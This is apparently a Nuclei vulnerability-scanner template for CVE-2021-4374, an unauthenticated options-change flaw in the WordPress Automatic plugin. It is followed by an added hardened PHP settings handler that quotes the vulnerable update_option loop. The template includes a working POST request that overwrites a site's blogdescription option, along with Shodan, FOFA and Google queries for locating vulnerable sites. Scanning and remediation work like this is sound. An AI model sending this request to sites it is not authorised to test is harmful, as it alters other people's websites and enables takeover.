id: CVE-2021-4374

info:
  name: WordPress Automatic Plugin - Unauthenticated Options Change
  author: intelligent-ears
  severity: critical
  description: |
    WordPress Automatic Plugin (versions 3.53.2 and below) contains a critical vulnerability that allows unauthenticated users to change arbitrary WordPress options through the process_form.php script. The vulnerable script uses update_option() on all POST parameters without authentication or capability checks, allowing attackers to create administrator accounts or modify critical settings. The vulnerability can be exploited even if the plugin is deactivated as it's a standalone script.
  impact: |
    Unauthenticated attackers can update arbitrary WordPress options via process_form.php, enabling them to create administrator accounts, modify critical settings, or completely compromise the WordPress site.
  remediation: |
    Upgrade to WordPress Automatic Plugin version 3.53.3 or later, or deactivate and delete the plugin.
  reference:
    - "https://www.wordfence.com/blog/2021/09/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
    - "https://nvd.nist.gov/vuln/detail/CVE-2021-4374"
  classification:
    cve-id: CVE-2021-4374
    epss-score: 0.16408
    epss-percentile: 0.96572
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-862
    cpe: cpe:2.3:a:valvepress:wordpress_automatic_plugin:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: valvepress
    product: wp-automatic
    fofa-query: "wp-content/plugins/wp-automatic/"
    google-query: inurl:"/wp-content/plugins/wp-automatic/"
    shodan-query: 'http.html:"wp-content/plugins/wp-automatic/"'
  tags: cve,cve2021,wp,wordpress,wp-plugin,wp-automatic,unauth,intrusive,vkev

http:
  - raw:
      - |
        POST /wp-content/plugins/wp-automatic/process_form.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        field1={{randstr}}&field3=test&field4=test&field5=test&field6=test&blogdescription={{randstr}}

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{randstr}}'

      - type: status
        status:
          - 200
# digest: 490a004630440220381b19c2e7fe1f5ba2bd70e26d53d7e5bef9f27bde4be8fd26e84dcfb418bb0302203bba3e7ab02bf6b6a45280253e1c223bebe2a0e492af477cb26f5d0ea3efb8a3:922c64590222798bb761d5b6d8e72950
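# The description above says process_form.php handed every POST parameter to update_option() with no
# authentication or capability check and ran as a standalone script. The block below is an added example,
# not code from the wp-automatic plugin, showing the hardened shape such a settings handler should have:
# the option names, the admin-post action name and the nonce action are assumed names for the illustration.

```php
<?php
// Added illustration (not the plugin's code). The option names, the admin-post
// action and the nonce action are assumptions made for this example.
//
// The pattern the template's description attributes to the vulnerable script,
// reachable by anyone and writing every POST key straight into the database:
//
//     foreach ($_POST as $key => $value) { update_option($key, $value); }
//
// The hardened version below closes each gap in turn.

// 1. Never run as a standalone script: only execute when loaded by WordPress,
//    so a direct request to the file cannot reach update_option() at all.
if (!defined('ABSPATH')) {
    http_response_code(403);
    exit;
}

// 2. Allow-list the writable options, each with its own sanitizer. Unrelated
//    keys such as blogdescription or default_role are silently ignored.
const WPA_EXAMPLE_ALLOWED_OPTIONS = [
    'wpa_example_field1' => 'sanitize_text_field',
    'wpa_example_field3' => 'sanitize_text_field',
];

function wpa_example_save_settings(): void {
    // 3. Authorization (the CWE-862 fix): caller must be able to manage options.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.', 403);
    }
    // 4. CSRF protection: the form must carry a valid nonce for this action.
    check_admin_referer('wpa_example_save_settings');

    foreach (WPA_EXAMPLE_ALLOWED_OPTIONS as $name => $sanitize) {
        if (!isset($_POST[$name])) {
            continue;
        }
        update_option($name, $sanitize(wp_unslash($_POST[$name])));
    }

    wp_safe_redirect(wp_get_referer() ?: admin_url('options-general.php'));
    exit;
}

// 5. Reachable only through admin-post.php; the admin_post_{action} hook fires
//    for logged-in users only (admin_post_nopriv_ would be the anonymous path).
add_action('admin_post_wpa_example_save_settings', 'wpa_example_save_settings');
```

# The corresponding form posts to admin_url('admin-post.php') with action=wpa_example_save_settings and
# a wp_nonce_field('wpa_example_save_settings') field, so an unauthenticated request fails at step 1 or 3.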